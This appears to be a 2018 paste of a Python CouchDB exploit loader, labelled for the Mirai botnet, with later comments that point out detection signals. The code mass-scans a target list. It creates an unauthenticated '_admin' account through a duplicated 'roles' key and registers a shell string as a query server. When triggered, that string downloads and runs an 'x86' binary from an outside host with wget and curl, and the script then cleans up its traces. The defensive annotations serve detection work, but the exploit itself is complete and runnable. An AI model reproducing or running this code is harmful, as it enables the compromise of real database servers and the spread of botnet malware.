
[COUCHDB EXPLOIT LOADER][PYTHON] [MIRAI]

xB4ckdoorREAL Nov 29th, 2018 313 Never
  1. Discord link: https://discord.gg/QDy3bUy or contact me on skype: b4ckdoor.porn
  2.  
  3. #!/usr/bin/env python
  4. from requests.auth import HTTPBasicAuth
  5. import random
  6. import requests
  7. import re
  8. import sys
  9. from threading import Thread
  10. from time import sleep
  11.    
  12.  
  13. ips = open(sys.argv[1], "r").readlines()
      # argv[1] is a file of target hosts, one per line; each line later gets
      # "http://" prepended and ":5984" appended, so entries are bare hosts/IPs.
      #
      # Pool of scratch database names; one is chosen at random per target and is
      # created, used for a single view request, then deleted. Create/delete
      # requests for any of these paths on port 5984 are usable as log indicators.
  14. Rdatabases = ["/a564r6fusmg","/dyejdffyjdxryj","/esreghsrgfbgrsb","/sfafdbsrdgjqef","/fyukddyuodyj","/yfjdued6yjdsza","/wefrhnwgerhgsrh","/sfdrebwbef","/fdfgffrgfdsg"]
  15.  
  16. def getVersion(ip):
          # Fingerprinting step: an unauthenticated GET of the server root, reading
          # the "version" field of the JSON reply. `ip` is already a full base URL
          # ("http://<host>:5984") when the caller passes it in.
          # Defender view: this is the first request of the sequence, so a root GET
          # followed within moments by writes to /_users and /_config from the same
          # source is a strong ordering signal in access logs.
  17.     version = requests.get(ip).json()["version"]
  18.     return version
  19.  
  20. def exploit(ip):
          # Per-target routine, run in its own thread. Sequence visible below:
          # fingerprint the CouchDB version, create an admin-role account through a
          # user document with a duplicated key, register a shell string as a
          # "query server", trigger it through a view, then delete the scratch
          # database and the config entry.
          # Every step is an HTTP request to port 5984, so reachability of that port
          # from untrusted networks is the precondition for all of it; the notes
          # below name the endpoint each step touches so it can be matched in logs.
  21.     global Rdatabases
          # The outermost bare `except` at the end swallows every error, so a target
          # that fails mid-sequence is abandoned silently and the cleanup steps do
          # not run for it; partial artifacts can therefore remain on such hosts.
  22.     try:
  23.         try:
                  # argv[2] selects one of four shell strings. All four do the same
                  # thing: change to /tmp, fetch a file named x86 with wget and curl,
                  # chmod it 777 and run it with the argument "root".
                  # NOTE(review): the hostnames look like redacted placeholders
                  # rather than live infrastructure; inferred from their shape only.
                  # Host-side signal: the CouchDB service account spawning a shell,
                  # wget or curl, or executing a freshly written file under /tmp.
  24.             if sys.argv[2] == "-r":
  25.                 cmd = "cd /tmp; wget http://b4.ck.do.or//x86; curl wget http://b4.ck.do.or/x86 -O; chmod 777 x86; ./x86 root;"
  26.             elif sys.argv[2] == "-c":
  27.                         cmd = "cd /tmp; wget http://1b4.ck.do.or/x86; curl wget http://b4.ck.do.or/x86 -O; chmod 777 x86; ./x86 root;"
  28.                     elif sys.argv[2] == "-w":
  29.                 cmd = "cd /tmp; wget http://b4.ck.do.or/x86; curl wget http://b4.ck.do.or/x86 -O; chmod 777 x86; ./x86 root;"
  30.             elif sys.argv[2] == "-x":
  31.                         cmd = "cd /tmp; wget http://b4.ck.do.or/x86; curl wget http://1b4.ck.do.or/x86 -O; chmod 777 x86; ./x86 root; "
  32.             elif not sys.argv[2]:
  33.                 print "NOT ENOUGH ARGUMENTS!"
  34.                 sys.exit(0)
  35.         except SyntaxError as e:
  36.             print "\n   Options: (-r|-c|-w|-x)"
  37.         db_ = random.choice(Rdatabases)
  38.         db = db_
  39.         ip = ip.rstrip("\n")
              # Plain HTTP to the default CouchDB port; from here on `ip` is the
              # base URL for every request.
  40.         ip = "http://"+ip+":5984"
  41.         version = getVersion(ip)
  42.         #print("[*] Detected CouchDB Version " + version)
              # Version gate: the dotted version string is collapsed to digits and
              # compared numerically. By this comparison 1.x releases up to 1.7.0
              # and 2.x releases below 2.1.1 are treated as targets; anything else
              # ends the thread. Running a release outside those ranges takes a
              # host out of this tool's target set.
  43.         vv = version.replace(".", "")
  44.         v = int(version[0])
  45.         if v == 1 and int(vv) <= 170:
  46.             version = 1
  47.         elif v == 2 and int(vv) < 211:
  48.             version = 2
  49.         else:
  50.             #print("[-] Version " + version + " not vulnerable.")
  51.             sys.exit()
  52.         with requests.session() as session:
  53.             #print("[*] Attempting %s Version %d"%(ip,v))
  54.             session.headers = {"Content-Type": "application/json"}
  55.      
  56.             try:
                      # User document in which the "roles" key appears twice:
                      # ["_admin"] first, [] second. It is sent before any
                      # credentials are set on the session, i.e. unauthenticated.
                      # Detection: a PUT to /_users/org.couchdb.user:<name> whose
                      # JSON body repeats a key, or any unauthenticated write that
                      # results in an account holding the _admin role.
  57.                 payload = '{"type": "user", "name": "'
  58.                 payload += "guest"
  59.                 payload += '", "roles": ["_admin"], "roles": [],'
  60.                 payload += '"password": "guest"}'
  61.  
  62.                 pr = session.put(ip + "/_users/org.couchdb.user:guest",
  63.                     data=payload)
  64.  
  65.                 #print("[+] User guest with password guest successfully created.")
                  # requests raises HTTPError only from raise_for_status(), which is
                  # never called here, so response status is not inspected and the
                  # following steps are sent regardless of how the server answered.
                  # Nothing later in the script deletes this user document, so a
                  # "guest" entry in _users is a durable artifact on any host that
                  # accepted the request; audit _users for it and for unexpected
                  # _admin role holders.
  66.             except requests.exceptions.HTTPError:
  67.                 sys.exit()
                  # All later requests carry HTTP Basic credentials guest/guest;
                  # Basic-auth logins under that name from external addresses are
                  # a further log indicator.
  68.             session.auth = HTTPBasicAuth("guest", "guest")
  69.             try:
                      # Writes the shell string as the value of a query_servers entry
                      # named "cmd": through /_config on the 1.x branch, through a
                      # /_node/... path on the 2.x branch after reading /_membership.
                      # Detection/hardening: alert on any HTTP write to
                      # */_config/query_servers/* and audit that config section for
                      # entries beyond the ones the installation is known to need.
  70.                 if version == 1:
  71.                     session.put(ip + "/_config/query_servers/cmd",
  72.                             data='"' + cmd + '"')
  73.                     #print("[+] Created payload at: " + ip + "/_config/query_servers/cmd")
  74.                 else:
  75.                     host = session.get(ip + "/_membership").json()["all_nodes"][0]
  76.                     session.put(ip + "/_node/" + ip + "/_config/query_servers/cmd",
  77.                             data='"' + cmd + '"')
  78.                     #print("[+] Created payload at: " + ip + "/_node/" + host + "/_config/query_servers/cmd")
  79.             except requests.exceptions.HTTPError as e:
  80.                 sys.exit()
  81.      
  82.             try:
                      # Creates the randomly chosen scratch database and a document
                      # "zero" with _id "HTP" in it; both exist only as scaffolding
                      # for the view request that follows.
  83.                 session.put(ip + db)
  84.                 session.put(ip + db + "/zero", data='{"_id": "HTP"}')
  85.             except requests.exceptions.HTTPError:
  86.                 sys.exit()
  87.      
  88.             # Execute payload
                  # The script expects a view declared with "language": "cmd" to make
                  # the server launch the query_servers entry registered above. The
                  # 1.x branch posts a temporary view; the 2.x branch posts a design
                  # document. Log signal: POST to /<db>/_temp_view or to a /_design/
                  # path with "language": "cmd" in the body.
  89.             try:
  90.                 if version == 1:
  91.                     session.post(ip + db + "/_temp_view?limit=10",
  92.                             data='{"language": "cmd", "map": ""}')
  93.                 else:
  94.                     session.post(ip + db + "/_design/zero",
  95.                             data='{"_id": "_design/zero", "views": {"god": {"map": ""} }, "language": "cmd"}')
                      # Printed unconditionally after the request returns; it does
                      # not reflect whether the server actually ran anything.
  96.                 print("[+] Command executed: " + cmd)
  97.             except requests.exceptions.HTTPError:
  98.                 sys.exit()
  99.  
  100.             #print("[*] Cleaning up.")
  101.  
  102.             # Cleanup database
                   # Artifact reduction: the scratch database is deleted right after
                   # use. A create/DELETE pair on one of the Rdatabases names within
                   # a short window is part of the same signature.
  103.             try:
  104.                 session.delete(ip + db)
  105.             except requests.exceptions.HTTPError:
  106.                 sys.exit()
  107.      
  108.             # Cleanup payload
                   # Attempts to remove the query_servers "cmd" entry as well, so its
                   # absence afterwards does not show a host was untouched; rely on
                   # request logs and the leftover user document instead.
  109.             try:
  110.                 if version == 1:
  111.                     session.delete(ip + "/_config/query_servers/cmd")
  112.                 else:
  113.                     host = session.get(ip + "/_membership").json()["all_nodes"][0]
  114.                     session.delete(ip + "/_node" + host + "/_config/query_servers/cmd")
  115.             except requests.exceptions.HTTPError:
  116.                 sys.exit()
  117.     except:
  118.         pass
  119. for ip in ips:
           # One thread per line of the target file, started 1 ms apart with no
           # upper bound on concurrency; errors while spawning are ignored.
           # On the wire this is a burst of HTTP connections to TCP 5984 across
           # many addresses from a single source, which flow or egress monitoring
           # can key on. Keeping 5984 unreachable from untrusted networks removes
           # a host from the reach of this loop entirely.
  120.     try:
  121.         hoho = Thread(target=exploit, args=(ip,))
  122.         hoho.start()
  123.         sleep(0.001)
  124.     except:
  125.         pass